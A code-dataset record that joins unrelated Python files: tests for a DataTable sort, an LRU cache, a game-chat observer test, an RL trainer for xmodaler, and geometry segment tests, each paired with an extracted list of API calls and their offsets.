'numpy.sqrt', 'numpy.sqrt', (['w'], {}), '(w)\n', (1133, 1136), False, 'import numpy\n'), ((1910, 1951), 'functools.reduce', 'reduce', (['numpy.dot', '(s0invsqrt, R, s0sqrt)'], {}), '(numpy.dot, (s0invsqrt, R, s0sqrt))\n', (1916, 1951), False, 'from functools import reduce\n'), ((2300, 2320), 'numpy.zeros_like', 'numpy.zeros_like', (['s0'], {}), '(s0)\n', (2316, 2320), False, 'import numpy\n'), ((2330, 2350), 'numpy.zeros_like', 'numpy.zeros_like', (['t0'], {}), '(t0)\n', (2346, 2350), False, 'import numpy\n'), ((2686, 2736), 'functools.reduce', 'reduce', (['numpy.dot', '(x1.T, t0 * (0.5 / c ** 2), x0)'], {}), '(numpy.dot, (x1.T, t0 * (0.5 / c ** 2), x0))\n', (2692, 2736), False, 'from functools import reduce\n'), ((2740, 2790), 'functools.reduce', 'reduce', (['numpy.dot', '(x0.T, t0 * (0.5 / c ** 2), x1)'], {}), '(numpy.dot, (x0.T, t0 * (0.5 / c ** 2), x1))\n', (2746, 2790), False, 'from functools import reduce\n'), ((2919, 2967), 'functools.reduce', 'reduce', (['numpy.dot', '(s0_invsqrt, sa0, s0_invsqrt)'], {}), '(numpy.dot, (s0_invsqrt, sa0, s0_invsqrt))\n', (2925, 2967), False, 'from functools import reduce\n'), ((3635, 3671), 'numpy.zeros', 'numpy.zeros', (['(n2, n2)'], {'dtype': 'v.dtype'}), '((n2, n2), dtype=v.dtype)\n', (3646, 3671), False, 'import numpy\n'), ((3679, 3715), 'numpy.zeros', 'numpy.zeros', (['(n2, n2)'], {'dtype': 'v.dtype'}), '((n2, n2), dtype=v.dtype)\n', (3690, 3715), False, 'import numpy\n'), ((4453, 4493), 'numpy.zeros', 'numpy.zeros', (['(3, n2, n2)'], {'dtype': 'v1.dtype'}), '((3, n2, n2), dtype=v1.dtype)\n', (4464, 4493), False, 'import numpy\n'), ((4500, 4540), 'numpy.zeros', 'numpy.zeros', (['(3, n2, n2)'], {'dtype': 'v1.dtype'}), '((3, n2, n2), dtype=v1.dtype)\n', (4511, 4540), False, 'import numpy\n'), ((4731, 4751), 'numpy.zeros_like', 'numpy.zeros_like', (['s1'], {}), '(s1)\n', (4747, 4751), False, 'import numpy\n'), ((4763, 4783), 'numpy.zeros_like', 'numpy.zeros_like', (['t1'], {}), '(t1)\n', (4779, 4783), False, 'import numpy\n'), ((5988, 6023), 'numpy.einsum', 'numpy.einsum', (['"""pq,xqi->xpi"""', 'c0', 'c1'], {}), "('pq,xqi->xpi', c0, c1)\n", (6000, 6023), False, 'import numpy\n'), ((6173, 6190), 'numpy.asarray', 'numpy.asarray', (['x1'], {}), '(x1)\n', (6186, 6190), False, 'import numpy\n'), ((9169, 9184), 'unittest.main', 'unittest.main', ([], {}), '()\n', (9182, 9184), False, 'import unittest\n'), ((1391, 1404), 'numpy.sqrt', 'numpy.sqrt', (['w'], {}), '(w)\n', (1401, 1404), False, 'import numpy\n'), ((1463, 1509), 'numpy.einsum', 'numpy.einsum', (['"""i,ij,j->ij"""', '(w ** 2)', 'a1', '(w ** 2)'], {}), "('i,ij,j->ij', w ** 2, a1, w ** 2)\n", (1475, 1509), False, 'import numpy\n'), ((1790, 1840), 'functools.reduce', 'reduce', (['numpy.dot', '(x0.T, t0 * (0.5 / c ** 2), x0)'], {}), '(numpy.dot, (x0.T, t0 * (0.5 / c ** 2), x0))\n', (1796, 1840), False, 'from functools import reduce\n'), ((1852, 1900), 'functools.reduce', 'reduce', (['numpy.dot', '(s0invsqrt, stild, s0invsqrt)'], {}), '(numpy.dot, (s0invsqrt, stild, s0invsqrt))\n', (1858, 1900), False, 'from functools import reduce\n'), ((2573, 2623), 'functools.reduce', 'reduce', (['numpy.dot', '(x0.T, t0 * (0.5 / c ** 2), x0)'], {}), '(numpy.dot, (x0.T, t0 * (0.5 / c ** 2), x0))\n', (2579, 2623), False, 'from functools import reduce\n'), ((2632, 2682), 'functools.reduce', 'reduce', (['numpy.dot', '(x0.T, t1 * (0.5 / c ** 2), x0)'], {}), '(numpy.dot, (x0.T, t1 * (0.5 / c ** 2), x0))\n', (2638, 2682), False, 'from functools import reduce\n'), ((3115, 3163), 'functools.reduce', 'reduce', (['numpy.dot', '(s0_invsqrt, sa0, s1_invsqrt)'], {}), '(numpy.dot, (s0_invsqrt, sa0, s1_invsqrt))\n', (3121, 3163), False, 'from functools import reduce\n'), ((892, 905), 'numpy.sqrt', 'numpy.sqrt', (['w'], {}), '(w)\n', (902, 905), False, 'import numpy\n'), ((993, 1006), 'numpy.sqrt', 'numpy.sqrt', (['w'], {}), '(w)\n', (1003, 1006), False, 'import numpy\n'), ((2983, 3031), 'functools.reduce', 'reduce', (['numpy.dot', '(s0_invsqrt, sa1, s0_invsqrt)'], {}), '(numpy.dot, (s0_invsqrt, sa1, s0_invsqrt))\n', (2989, 3031), False, 'from functools import reduce\n'), ((3049, 3097), 'functools.reduce', 'reduce', (['numpy.dot', '(s1_invsqrt, sa0, s0_invsqrt)'], {}), '(numpy.dot, (s1_invsqrt, sa0, s0_invsqrt))\n', (3055, 3097), False, 'from functools import reduce\n'), ((6823, 6842), 'pyscf.lib.light_speed', 'lib.light_speed', (['(10)'], {}), '(10)\n', (6838, 6842), False, 'from pyscf import lib\n'), ((7208, 7265), 'pyscf.x2c.sfx2c1e_grad._gen_first_order_quantities', 'sfx2c1e_grad._gen_first_order_quantities', (['mol', 'e0', 'c0', 'x0'], {}), '(mol, e0, c0, x0)\n', (7248, 7265), False, 'from pyscf.x2c import sfx2c1e_grad\n'), ((7397, 7416), 'pyscf.lib.light_speed', 'lib.light_speed', (['(10)'], {}), '(10)\n', (7412, 7416), False, 'from pyscf import lib\n'), ((7780, 7837), 'pyscf.x2c.sfx2c1e_grad._gen_first_order_quantities', 'sfx2c1e_grad._gen_first_order_quantities', (['mol', 'e0', 'c0', 'x0'], {}), '(mol, e0, c0, x0)\n', (7820, 7837), False, 'from pyscf.x2c import sfx2c1e_grad\n'), ((7973, 7992), 'pyscf.lib.light_speed', 'lib.light_speed', (['(10)'], {}), '(10)\n', (7988, 7992), False, 'from pyscf import lib\n'), ((8019, 8044), 'pyscf.x2c.sfx2c1e.SpinFreeX2C', 'sfx2c1e.SpinFreeX2C', (['mol1'], {}), '(mol1)\n', (8038, 8044), False, 'from pyscf.x2c import sfx2c1e\n'), ((8065, 8090), 'pyscf.x2c.sfx2c1e.SpinFreeX2C', 'sfx2c1e.SpinFreeX2C', (['mol2'], {}), '(mol2)\n', (8084, 8090), False, 'from pyscf.x2c import sfx2c1e\n'), ((8112, 8136), 'pyscf.x2c.sfx2c1e.SpinFreeX2C', 'sfx2c1e.SpinFreeX2C', (['mol'], {}), '(mol)\n', (8131, 8136), False, 'from pyscf.x2c import sfx2c1e\n')]
|
from datastack import DataTable, DataColumn, label, col, desc
import pytest
import numpy as np
def test_one():
tbl = (DataTable(a=(1,2,1,2,3,1), b=(4,5,6,3,2,1),c=(6,7,8,1,2,3))
.order_by(desc(label("b")))
)
exp = DataTable(a=(1,2,1,2,3,1), b=(6,5,4,3,2,1), c=(8,7,6,1,2,3))
assert tbl == exp
def test_one_str():
tbl = (DataTable(a=(1,2,1,2,3,1), b=(4,5,6,3,2,1),c=list("abcdef"))
.order_by(label("b"))
)
exp = DataTable(a=(1,3,2,1,2,1), b=(1,2,3,4,5,6), c=list("fedabc"))
assert tbl == exp
def test_two():
tbl = (DataTable(b=(4,5,2,3,2,1),c=(6,7,8,1,2,3),a=(1,2,1,2,3,1))
.order_by(label("b"), desc(label("a")), label("c"), )
)
exp = DataTable( b=(1,2,2,3,4,5), c=(3,2,8,1,6,7),a=(1,3,1,2,1,2))
assert tbl == exp
def test_two_asc():
data = {"col1": np.array((1, 2, 3, 4, 5, 4, 3, 2, 1)),
"col2": np.array(list("abcdeabcd")),
"col3": np.array((10, 11, 9, 8, 7, 2, 12, 100, 1))}
tbl = (DataTable.from_dict(data)
.order_by(label("col1"), label("col2"))
)
exp = DataTable.from_dict({'col1': np.array([1, 1, 2, 2, 3, 3, 4, 4, 5]),
'col2': np.array(['a', 'd', 'b', 'c', 'b', 'c', 'a', 'd', 'e']),
'col3': np.array([10, 1, 11, 100, 12, 9, 2, 8, 7])})
assert tbl == exp
def test_two_asc_desc():
data = {"col1": np.array((1, 2, 3, 4, 5, 4, 3, 2, 1)),
"col2": np.array(list("abcdeabcd")),
"col3": np.array((10, 11, 9, 8, 7, 2, 12, 100, 1))}
tbl = (DataTable.from_dict(data)
.order_by(label("col1"), desc(label("col2")))
)
exp = DataTable.from_dict({'col1': np.array([1, 1, 2, 2, 3, 3, 4, 4, 5]),
'col2': np.array(['d', 'a', 'c', 'b', 'c', 'b', 'd', 'a', 'e']),
'col3': np.array([1, 10, 100, 11, 9, 12, 8, 2, 7])})
assert tbl == exp
|
[
"datastack.DataTable",
"datastack.DataTable.from_dict",
"numpy.array",
"datastack.label"
] |
[((245, 320), 'datastack.DataTable', 'DataTable', ([], {'a': '(1, 2, 1, 2, 3, 1)', 'b': '(6, 5, 4, 3, 2, 1)', 'c': '(8, 7, 6, 1, 2, 3)'}), '(a=(1, 2, 1, 2, 3, 1), b=(6, 5, 4, 3, 2, 1), c=(8, 7, 6, 1, 2, 3))\n', (254, 320), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((732, 807), 'datastack.DataTable', 'DataTable', ([], {'b': '(1, 2, 2, 3, 4, 5)', 'c': '(3, 2, 8, 1, 6, 7)', 'a': '(1, 3, 1, 2, 1, 2)'}), '(b=(1, 2, 2, 3, 4, 5), c=(3, 2, 8, 1, 6, 7), a=(1, 3, 1, 2, 1, 2))\n', (741, 807), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((441, 451), 'datastack.label', 'label', (['"""b"""'], {}), "('b')\n", (446, 451), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((666, 676), 'datastack.label', 'label', (['"""b"""'], {}), "('b')\n", (671, 676), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((696, 706), 'datastack.label', 'label', (['"""c"""'], {}), "('c')\n", (701, 706), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((858, 895), 'numpy.array', 'np.array', (['(1, 2, 3, 4, 5, 4, 3, 2, 1)'], {}), '((1, 2, 3, 4, 5, 4, 3, 2, 1))\n', (866, 895), True, 'import numpy as np\n'), ((958, 1000), 'numpy.array', 'np.array', (['(10, 11, 9, 8, 7, 2, 12, 100, 1)'], {}), '((10, 11, 9, 8, 7, 2, 12, 100, 1))\n', (966, 1000), True, 'import numpy as np\n'), ((1064, 1077), 'datastack.label', 'label', (['"""col1"""'], {}), "('col1')\n", (1069, 1077), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((1079, 1092), 'datastack.label', 'label', (['"""col2"""'], {}), "('col2')\n", (1084, 1092), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((1444, 1481), 'numpy.array', 'np.array', (['(1, 2, 3, 4, 5, 4, 3, 2, 1)'], {}), '((1, 2, 3, 4, 5, 4, 3, 2, 1))\n', (1452, 1481), True, 'import numpy as np\n'), ((1544, 1586), 'numpy.array', 'np.array', (['(10, 11, 9, 8, 7, 2, 12, 100, 1)'], {}), '((10, 11, 9, 8, 7, 2, 12, 100, 1))\n', (1552, 1586), True, 'import numpy as np\n'), ((1650, 1663), 'datastack.label', 'label', (['"""col1"""'], {}), "('col1')\n", (1655, 1663), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((125, 200), 'datastack.DataTable', 'DataTable', ([], {'a': '(1, 2, 1, 2, 3, 1)', 'b': '(4, 5, 6, 3, 2, 1)', 'c': '(6, 7, 8, 1, 2, 3)'}), '(a=(1, 2, 1, 2, 3, 1), b=(4, 5, 6, 3, 2, 1), c=(6, 7, 8, 1, 2, 3))\n', (134, 200), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((210, 220), 'datastack.label', 'label', (['"""b"""'], {}), "('b')\n", (215, 220), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((587, 662), 'datastack.DataTable', 'DataTable', ([], {'b': '(4, 5, 2, 3, 2, 1)', 'c': '(6, 7, 8, 1, 2, 3)', 'a': '(1, 2, 1, 2, 3, 1)'}), '(b=(4, 5, 2, 3, 2, 1), c=(6, 7, 8, 1, 2, 3), a=(1, 2, 1, 2, 3, 1))\n', (596, 662), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((683, 693), 'datastack.label', 'label', (['"""a"""'], {}), "('a')\n", (688, 693), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((1016, 1041), 'datastack.DataTable.from_dict', 'DataTable.from_dict', (['data'], {}), '(data)\n', (1035, 1041), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((1143, 1180), 'numpy.array', 'np.array', (['[1, 1, 2, 2, 3, 3, 4, 4, 5]'], {}), '([1, 1, 2, 2, 3, 3, 4, 4, 5])\n', (1151, 1180), True, 'import numpy as np\n'), ((1226, 1281), 'numpy.array', 'np.array', (["['a', 'd', 'b', 'c', 'b', 'c', 'a', 'd', 'e']"], {}), "(['a', 'd', 'b', 'c', 'b', 'c', 'a', 'd', 'e'])\n", (1234, 1281), True, 'import numpy as np\n'), ((1327, 1369), 'numpy.array', 'np.array', (['[10, 1, 11, 100, 12, 9, 2, 8, 7]'], {}), '([10, 1, 11, 100, 12, 9, 2, 8, 7])\n', (1335, 1369), True, 'import numpy as np\n'), ((1602, 1627), 'datastack.DataTable.from_dict', 'DataTable.from_dict', (['data'], {}), '(data)\n', (1621, 1627), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((1670, 1683), 'datastack.label', 'label', (['"""col2"""'], {}), "('col2')\n", (1675, 1683), False, 'from datastack import DataTable, DataColumn, label, col, desc\n'), ((1735, 1772), 'numpy.array', 'np.array', (['[1, 1, 2, 2, 3, 3, 4, 4, 5]'], {}), '([1, 1, 2, 2, 3, 3, 4, 4, 5])\n', (1743, 1772), True, 'import numpy as np\n'), ((1783, 1838), 'numpy.array', 'np.array', (["['d', 'a', 'c', 'b', 'c', 'b', 'd', 'a', 'e']"], {}), "(['d', 'a', 'c', 'b', 'c', 'b', 'd', 'a', 'e'])\n", (1791, 1838), True, 'import numpy as np\n'), ((1849, 1891), 'numpy.array', 'np.array', (['[1, 10, 100, 11, 9, 12, 8, 2, 7]'], {}), '([1, 10, 100, 11, 9, 12, 8, 2, 7])\n', (1857, 1891), True, 'import numpy as np\n')]
|
import collections
import logging
import os
import re
from sys import getsizeof
from threading import Event, RLock
from typing import Any, Callable, Dict, Hashable, Tuple, TypeVar, Union
import numpy as np
from cachetools import Cache
from humanize import naturalsize
CachedItemType = TypeVar("CachedItemType")
logger = logging.getLogger(__name__)
SHOW_CACHE_LOGS = os.environ.get("SHOW_CACHE_LOGS", False)
class CacheFullException(Exception):
...
class CacheEmptyException(Exception):
...
class LazyLoadCache(Cache):
"""Least Recently Used (LRU) cache implementation."""
_marker = object()
def __init__(self, cache_name: str = "Default pd-sdk Cache", cache_max_size: str = "1GiB"):
self.cache_name = cache_name
self._maximum_allowed_bytes: int = byte_str_to_bytes(byte_str=cache_max_size)
logger.info(
f"Initializing LazyLoadCache '{cache_name}' with available "
f"space of {naturalsize(self._maximum_allowed_bytes)}."
)
self._key_load_locks: Dict[Hashable, Tuple[RLock, Event]] = dict()
self._create_key_lock = RLock()
Cache.__init__(self, maxsize=self._maximum_allowed_bytes, getsizeof=LazyLoadCache.getsizeof)
self.__order = collections.OrderedDict()
def get_item(self, key: Hashable, loader: Callable[[], CachedItemType]) -> CachedItemType:
key_lock, wait_event = self._get_locks(key=key)
with key_lock:
if key not in self:
if SHOW_CACHE_LOGS:
logger.debug(f"load key {key} to cache")
value = loader()
try:
self[key] = value
except CacheFullException as e:
logger.warning(f"Cant store {key} in Cache since no more space is left! {str(e)}")
return value
wait_event.set()
return value
return self[key]
def __missing__(self, key):
raise KeyError(key)
def __getitem__(self, key: Hashable, cache_getitem: Callable[[Cache, Hashable], Any] = Cache.__getitem__):
value = cache_getitem(self, key)
if key in self: # __missing__ may not store item
self.__update(key)
return value
def __setitem__(self, key: Hashable, value, cache_setitem=Cache.__setitem__):
self._custom_set_item(key, value)
self.__update(key)
def _get_locks(self, key: Hashable) -> Tuple[RLock, Event]:
if key not in self._key_load_locks:
with self._create_key_lock:
if key not in self._key_load_locks:
self._key_load_locks[key] = (RLock(), Event())
return self._key_load_locks[key]
def _custom_set_item(self, key, value):
size = self.getsizeof(value)
if SHOW_CACHE_LOGS:
logger.debug(f"add item {key} with size {naturalsize(size)}")
if size > self.maxsize:
raise ValueError("value too large")
if key not in self._Cache__data or self._Cache__size[key] < size:
self.free_space_for_n_bytes(n_bytes=size)
if key in self._Cache__data:
diffsize = size - self._Cache__size[key]
else:
diffsize = size
self._Cache__data[key] = value
self._Cache__size[key] = size
self._Cache__currsize += diffsize
def __delitem__(self, key: Hashable, cache_delitem=Cache.__delitem__):
key_lock, wait_event = self._get_locks(key=key)
with key_lock:
if wait_event.is_set():
if SHOW_CACHE_LOGS:
logger.debug(f"delete {key} from cache")
cache_delitem(self, key)
del self.__order[key]
wait_event.clear()
def free_space_for_n_bytes(self, n_bytes: Union[float, int]):
try:
while n_bytes > self.free_space:
self.popitem()
except CacheEmptyException:
if n_bytes > self.free_space:
raise CacheFullException(
f"Cache is already empty but there is no more space left tho store {n_bytes}B!"
)
@property
def maxsize(self) -> int:
"""The maximum size of the cache."""
return self._maximum_allowed_bytes
@maxsize.setter
def maxsize(self, value: Union[str, int]):
if isinstance(value, int):
self._maximum_allowed_bytes = value
elif isinstance(value, str):
self._maximum_allowed_bytes: int = byte_str_to_bytes(byte_str=value)
else:
raise ValueError(f"invalid type for maxsite {type(value)}! Has to be int or str.")
logger.info(f"Changed '{self.cache_name}' available space to {naturalsize(self._maximum_allowed_bytes)}.")
# If size got smaller make sure cache is cleared up
self.free_space_for_n_bytes(n_bytes=0)
@property
def currsize(self) -> int:
"""The current size of the cache."""
return int(self._Cache__currsize)
@property
def free_space(self) -> int:
"""The maximum size of the caches free space."""
remaining_allowed_space = self.maxsize - self.currsize
return remaining_allowed_space
def popitem(self):
"""Remove and return the `(key, value)` pair least recently used."""
try:
it = iter(list(self.__order.keys()))
key = next(it)
except StopIteration:
raise CacheEmptyException("%s is empty" % type(self).__name__)
else:
del self[key]
def pop(self, key, default=_marker):
key_lock, wait_event = self._get_locks(key=key)
with key_lock:
if key in self:
value = self[key]
del self[key]
elif default is LazyLoadCache._marker:
raise KeyError(key)
else:
value = default
return value
def clear(self):
"D.clear() -> None. Remove all items from D."
try:
while True:
self.popitem()
except CacheEmptyException:
pass
def __update(self, key):
try:
self.__order.move_to_end(key)
except KeyError:
self.__order[key] = None
@staticmethod
def getsizeof(value, seen=None):
"""Return the size of a cache element's value."""
# handle recursion
if seen is None:
seen = set()
obj_id = id(value)
if obj_id in seen:
return 0
seen.add(obj_id)
size = getsizeof(value)
if hasattr(value, "__dict__"):
pass
# for k, v in value.__dict__.items():
# size += getsizeof(v)
elif isinstance(value, list):
for i in value:
size += LazyLoadCache.getsizeof(i, seen)
elif isinstance(value, dict):
for k, v in value.items():
size += LazyLoadCache.getsizeof(v, seen)
elif isinstance(value, np.ndarray):
size = value.nbytes
return size
def byte_str_to_bytes(byte_str: str) -> int:
split_numbers_and_letters = re.match(r"([.0-9]+)([kKMGTPEZY]*)([i]*)([bB]+)", byte_str.replace(" ", ""), re.I)
powers = {"": 0, "k": 1, "m": 2, "g": 3, "t": 4, "p": 5, "e": 6, "z": 7, "y": 8}
if split_numbers_and_letters is None:
raise ValueError(
f"Invalid byte string format {byte_str}. `byte_str` has to be an integer string followed by a byte unit."
)
number, power_letter, base_letter, bites_or_bytes = split_numbers_and_letters.groups()
bit_factor = 1 if bites_or_bytes == "B" else 1 / 8
base = 1024 if base_letter == "i" else 1000
power = powers[power_letter.lower()]
number = float(number)
total_bits = number * base**power * bit_factor
return int(total_bits)
cache_max_ram_usage_factor = float(os.environ.get("CACHE_MAX_USAGE_FACTOR", 0.1)) # 10% free space max
cache_max_size = os.environ.get("CACHE_MAX_BYTES", "1GiB")
if "CACHE_MAX_USAGE_FACTOR" in os.environ:
logger.warning(
"CACHE_MAX_USAGE_FACTOR is not longer supported! Use CACHE_MAX_BYTES instead to set a cache size in bytes!"
)
LAZY_LOAD_CACHE = LazyLoadCache(cache_max_size=cache_max_size)
|
[
"threading.RLock",
"os.environ.get",
"cachetools.Cache.__init__",
"threading.Event",
"sys.getsizeof",
"collections.OrderedDict",
"typing.TypeVar",
"logging.getLogger",
"humanize.naturalsize"
] |
[((287, 312), 'typing.TypeVar', 'TypeVar', (['"""CachedItemType"""'], {}), "('CachedItemType')\n", (294, 312), False, 'from typing import Any, Callable, Dict, Hashable, Tuple, TypeVar, Union\n'), ((323, 350), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (340, 350), False, 'import logging\n'), ((370, 410), 'os.environ.get', 'os.environ.get', (['"""SHOW_CACHE_LOGS"""', '(False)'], {}), "('SHOW_CACHE_LOGS', False)\n", (384, 410), False, 'import os\n'), ((8030, 8071), 'os.environ.get', 'os.environ.get', (['"""CACHE_MAX_BYTES"""', '"""1GiB"""'], {}), "('CACHE_MAX_BYTES', '1GiB')\n", (8044, 8071), False, 'import os\n'), ((7944, 7989), 'os.environ.get', 'os.environ.get', (['"""CACHE_MAX_USAGE_FACTOR"""', '(0.1)'], {}), "('CACHE_MAX_USAGE_FACTOR', 0.1)\n", (7958, 7989), False, 'import os\n'), ((1118, 1125), 'threading.RLock', 'RLock', ([], {}), '()\n', (1123, 1125), False, 'from threading import Event, RLock\n'), ((1134, 1231), 'cachetools.Cache.__init__', 'Cache.__init__', (['self'], {'maxsize': 'self._maximum_allowed_bytes', 'getsizeof': 'LazyLoadCache.getsizeof'}), '(self, maxsize=self._maximum_allowed_bytes, getsizeof=\n LazyLoadCache.getsizeof)\n', (1148, 1231), False, 'from cachetools import Cache\n'), ((1250, 1275), 'collections.OrderedDict', 'collections.OrderedDict', ([], {}), '()\n', (1273, 1275), False, 'import collections\n'), ((6608, 6624), 'sys.getsizeof', 'getsizeof', (['value'], {}), '(value)\n', (6617, 6624), False, 'from sys import getsizeof\n'), ((956, 996), 'humanize.naturalsize', 'naturalsize', (['self._maximum_allowed_bytes'], {}), '(self._maximum_allowed_bytes)\n', (967, 996), False, 'from humanize import naturalsize\n'), ((4755, 4795), 'humanize.naturalsize', 'naturalsize', (['self._maximum_allowed_bytes'], {}), '(self._maximum_allowed_bytes)\n', (4766, 4795), False, 'from humanize import naturalsize\n'), ((2673, 2680), 'threading.RLock', 'RLock', ([], {}), '()\n', (2678, 2680), False, 'from threading import Event, RLock\n'), ((2682, 2689), 'threading.Event', 'Event', ([], {}), '()\n', (2687, 2689), False, 'from threading import Event, RLock\n'), ((2895, 2912), 'humanize.naturalsize', 'naturalsize', (['size'], {}), '(size)\n', (2906, 2912), False, 'from humanize import naturalsize\n')]
|
import pytest
from unittest import mock
from unittest.mock import AsyncMock, MagicMock
from src.bot.gameobservers.WinGameChatObserver import WinGameChatObserver
class TestNumberGameObservers:
@pytest.mark.asyncio
async def test_win_chat_announce_winners(self):
"""tests winning messages are called when the game is over"""
mock_subject = AsyncMock()
mock_subject.won = True
mock_subject.winning_team_id = 1
team_one = "Team 1"
team_names = ["User 1", "User 2"]
mock_subject.team_data = MagicMock()
mock_subject.team_data.get_team_member_map = MagicMock()
mock_subject.team_data.get_team_member_map.return_value = {1: ['id1', 'id2']}
winGameChatObserver = WinGameChatObserver()
winGameChatObserver.get_team_name = MagicMock()
winGameChatObserver.get_team_name.return_value = team_one
winGameChatObserver.get_usernames = MagicMock()
winGameChatObserver.get_usernames.return_value = team_names
await winGameChatObserver.update(mock_subject)
mock_subject.send_message.assert_called()
|
[
"unittest.mock.AsyncMock",
"unittest.mock.MagicMock",
"src.bot.gameobservers.WinGameChatObserver.WinGameChatObserver"
] |
[((365, 376), 'unittest.mock.AsyncMock', 'AsyncMock', ([], {}), '()\n', (374, 376), False, 'from unittest.mock import AsyncMock, MagicMock\n'), ((556, 567), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (565, 567), False, 'from unittest.mock import AsyncMock, MagicMock\n'), ((621, 632), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (630, 632), False, 'from unittest.mock import AsyncMock, MagicMock\n'), ((749, 770), 'src.bot.gameobservers.WinGameChatObserver.WinGameChatObserver', 'WinGameChatObserver', ([], {}), '()\n', (768, 770), False, 'from src.bot.gameobservers.WinGameChatObserver import WinGameChatObserver\n'), ((815, 826), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (824, 826), False, 'from unittest.mock import AsyncMock, MagicMock\n'), ((937, 948), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (946, 948), False, 'from unittest.mock import AsyncMock, MagicMock\n')]
|
# Copyright 2021 JD.com, Inc., JD AI
"""
@author: <NAME>
@contact: <EMAIL>
"""
import time
import copy
import torch
from .defaults import DefaultTrainer
from xmodaler.scorer import build_scorer
from xmodaler.config import kfg
from xmodaler.losses import build_rl_losses
import xmodaler.utils.comm as comm
from .build import ENGINE_REGISTRY
__all__ = ['RLTrainer']
@ENGINE_REGISTRY.register()
class RLTrainer(DefaultTrainer):
def __init__(self, cfg):
super(RLTrainer, self).__init__(cfg)
self.scorer = self.build_scorer(cfg)
self.losses = build_rl_losses(cfg)
@classmethod
def build_scorer(cls, cfg):
return build_scorer(cfg)
def run_step(self):
start = time.perf_counter()
try:
data = next(self._train_data_loader_iter)
except StopIteration:
self._train_data_loader_iter = iter(self.train_data_loader)
data = next(self._train_data_loader_iter)
data_time = time.perf_counter() - start
data = comm.unwrap_model(self.model).preprocess_batch(data)
self.model.eval()
with torch.no_grad():
bs_data = copy.copy(data)
bs_outputs_dict = self.model(bs_data, use_beam_search=False, output_sents=False)
bs_rewards = self.scorer(bs_outputs_dict)
self.model.train()
data[kfg.DECODE_BY_SAMPLE] = True
outputs_dict = self.model(data, use_beam_search=False, output_sents=False)
rewards = self.scorer(outputs_dict)
rewards = torch.from_numpy(rewards[kfg.REWARDS] - bs_rewards[kfg.REWARDS]).float().cuda()
outputs_dict.update({ kfg.REWARDS: rewards })
losses_dict = {}
for loss in self.losses:
loss_dict = loss(outputs_dict)
losses_dict.update(loss_dict)
losses = sum(losses_dict.values())
self.optimizer.zero_grad()
losses.backward()
bs_rewards.pop(kfg.REWARDS)
losses_dict.update(bs_rewards)
self._write_metrics(losses_dict, data_time)
self.optimizer.step()
|
[
"xmodaler.scorer.build_scorer",
"xmodaler.losses.build_rl_losses",
"copy.copy",
"time.perf_counter",
"xmodaler.utils.comm.unwrap_model",
"torch.no_grad",
"torch.from_numpy"
] |
[((590, 610), 'xmodaler.losses.build_rl_losses', 'build_rl_losses', (['cfg'], {}), '(cfg)\n', (605, 610), False, 'from xmodaler.losses import build_rl_losses\n'), ((680, 697), 'xmodaler.scorer.build_scorer', 'build_scorer', (['cfg'], {}), '(cfg)\n', (692, 697), False, 'from xmodaler.scorer import build_scorer\n'), ((742, 761), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (759, 761), False, 'import time\n'), ((1011, 1030), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (1028, 1030), False, 'import time\n'), ((1153, 1168), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (1166, 1168), False, 'import torch\n'), ((1193, 1208), 'copy.copy', 'copy.copy', (['data'], {}), '(data)\n', (1202, 1208), False, 'import copy\n'), ((1057, 1086), 'xmodaler.utils.comm.unwrap_model', 'comm.unwrap_model', (['self.model'], {}), '(self.model)\n', (1074, 1086), True, 'import xmodaler.utils.comm as comm\n'), ((1575, 1639), 'torch.from_numpy', 'torch.from_numpy', (['(rewards[kfg.REWARDS] - bs_rewards[kfg.REWARDS])'], {}), '(rewards[kfg.REWARDS] - bs_rewards[kfg.REWARDS])\n', (1591, 1639), False, 'import torch\n')]
|
import unittest, random
from models.point import Point
from models.segment import Segment
import numpy as np
class TestSegmentMethods(unittest.TestCase):
def test_new(self):
with self.assertRaises(ValueError) as context:
Segment([])
def test_extremums(self):
a = Point(random.randint(0, 100), random.randint(0, 100))
b = Point(random.randint(0, 100), random.randint(0, 100))
c = Point(random.randint(0, 100), random.randint(0, 100))
segment = Segment([a, b, c])
self.assertEqual(segment.start, a)
self.assertEqual(segment.end, c)
def test_getitem(self):
a = Point(10, 20)
b = Point(20, 30)
c = Point(30, 40)
segment = Segment([a, b, c])
self.assertEqual(segment[Point(10, 20)], a) # Access by point
self.assertEqual(segment[20, 30], b) # Access by coordinates
self.assertEqual(segment[2], c) # Access by index
self.assertEqual(segment[100, 100], None) # Accessing a missing point
def test_append(self):
a = Point(10, 20)
b = Point(20, 30)
c = Point(30, 40)
segment = Segment([a, b, c])
segment.append(Point(31, 40))
# Working case
self.assertEqual(segment.end, Point(31, 40))
# Point is too far
with self.assertRaises(ValueError) as context:
segment.append(Point(100, 100))
# Point already exists
with self.assertRaises(ValueError) as context:
segment.append(Point(31, 40))
def test_angle(self):
angle_1 = Segment([Point(0, 0), Point(10, 10)]) # Angle is 45ยฐ
angle_2 = Segment([Point(0, 0), Point(10, 20)]) # Angle is arctan(20/10)
angle_half = Segment([Point(0, 0), Point(20, 10)]) # Angle is arctan(10/20)
angle_vertical = Segment([Point(0, 0), Point(10, 0)]) # Angle is 0ยฐ
angle_horizontal = Segment([Point(0, 0), Point(0, 10)]) # Angle is 90ยฐ
self.assertAlmostEqual(angle_1.angle(radians = True), np.pi / 4)
